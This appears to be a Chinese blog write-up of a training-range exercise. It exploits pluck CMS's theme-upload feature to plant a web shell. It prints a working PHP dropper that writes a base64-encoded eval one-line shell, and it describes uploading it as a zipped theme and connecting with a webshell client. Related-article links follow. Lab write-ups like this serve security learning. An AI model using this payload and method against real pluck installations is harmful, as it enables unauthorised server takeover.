东塔靶场之文件上传cms–pluck

pluck是一个小型简单的内容管理系统,由PHP写成。即使你没有编程语言知识，也可以很容易地使用它来管理站点，功能有给页面插照片、在blog里写文章、分享照片等
pluck cms后台存在文件上传漏洞，攻击者可以利用该漏洞获取获取服务器权限

准备：

一个info.php文件

<?php file_put_contents('qianxun.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8+'));?>

其中PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8+是一句话木马<?php @eval($_POST[cmd]); ?>的base64编码。

file_put_contents函数把一个字符串写入文件中。与依次调用 fopen()，fwrite() 以及 fclose() 功能一样。

将info.php文件打包成shell.zip文件
菜刀、浏览器

开搞：

打开主页登录：

密码为admin

进入到选择主题界面：

点击安装主题：

将之前准备的shell.zip上传：

点击回到主题页：

此时，shell.zip已被自动解压，其中的一句话木马已被写入。

直接用菜刀连接获取shell：

成功！

小结：

今天刷了东塔的文件上传类的靶场，感觉系统学过一边后通关很简单，能把学到的用起来就很爽，正所谓学而时习之，不亦说乎？哈哈哈，不过还需要继续练习更多才能开阔思路，运用到实战，明天继续加油！over

东塔靶场之文件上传cms--pluck相关推荐

Pikachu靶场之文件上传漏洞详解
Pikachu靶场之文件上传漏洞详解前言文件上传漏洞简述什么是文件上传漏洞? 文件上传的原理文件上传漏洞有哪些危害文件上传漏洞如何查找及判断文件上传如何防御文件上传漏洞绕过的方式有哪些 ...
[网络安全自学篇] 三十一.文件上传之Upload-labs靶场及CTF题目01-10（四）
这是作者的系列网络安全自学教程,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了编辑器漏洞和IIS高版本文件上传漏洞,包括FCKeditor.eWeb ...
探究文件上传安全：upload-labs靶场的绕过技巧
数据来源本文仅用于信息安全的学习,请遵守相关法律法规,严禁用于非法途径.若观众因此作出任何危害网络安全的行为,后果自负,与本人无关. 文件上传基础 01 什么是文件上传 02 文件上传产生漏洞的原因 ...
文件上传漏洞小结与Upload-labs 靶场纪实
WEB安全--文件上传靶场记录文章目录 WEB安全--文件上传靶场记录文件上传的思路与分类(图片转自小迪): 一.前端验证的绕过 Pass 01 二.验证绕过--白名单 1.MIME验证绕过 pa ...
[网络安全自学篇] 三十三.文件上传之绕狗一句话原理和绕过安全狗（六）
这是作者的系列网络安全自学教程,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文详细讲解了Upload-labs靶场及文件上传漏洞20道CTF题目,并结合C ...
网络安全课第七节文件上传漏洞的检测与防御
13 文件上传漏洞:种植服务器木马的捷径上一讲介绍过反序列化漏洞,利用漏洞常可以造成执行代码的严重后果. 从本讲开始将介绍文件上传漏洞,它比反序列化漏洞原理与利用更加简单,但同样可以达到控制服务器的 ...
文件上传漏洞 (上传知识点、题型总结大全-upload靶场全解)
文件上传漏洞什么是文件上传漏洞什么是webshell 一句话木马大全产生文件上传漏洞的原因文件上传漏洞的攻击与防御方式 1.前端限制 2.检查扩展名 1.黑名单策略, 2.白名单策略 3.检查 ...
帝国cms empirecms 文件上传（CVE-2018-18086）复现
所有文章,仅供安全研究与学习之用,后果自负! 这里写目录标题 empirecms 文件上传 (CVE-2018-18086) 0x01 漏洞描述 0x02 影响范围 0x03 漏洞复现 0x04 漏洞 ...
（20）文件上传漏洞：原理、原因、常见触发点分析，vulhub、upload、公开cms上传漏洞多种方法测试
目录理解文件上传漏洞: 文件上传漏洞: 文件上传漏洞: WebShell: 一句话木马: 产生上传漏洞原因: 原因: 常见的问题: 危害: 触发点,并判断是否存在文件上传漏洞: 触发点: 查找方法: ...

东塔靶场之文件上传cms--pluck

东塔靶场之文件上传cms–pluck

准备：

开搞：

小结：

东塔靶场之文件上传cms--pluck相关推荐

最新文章

热门文章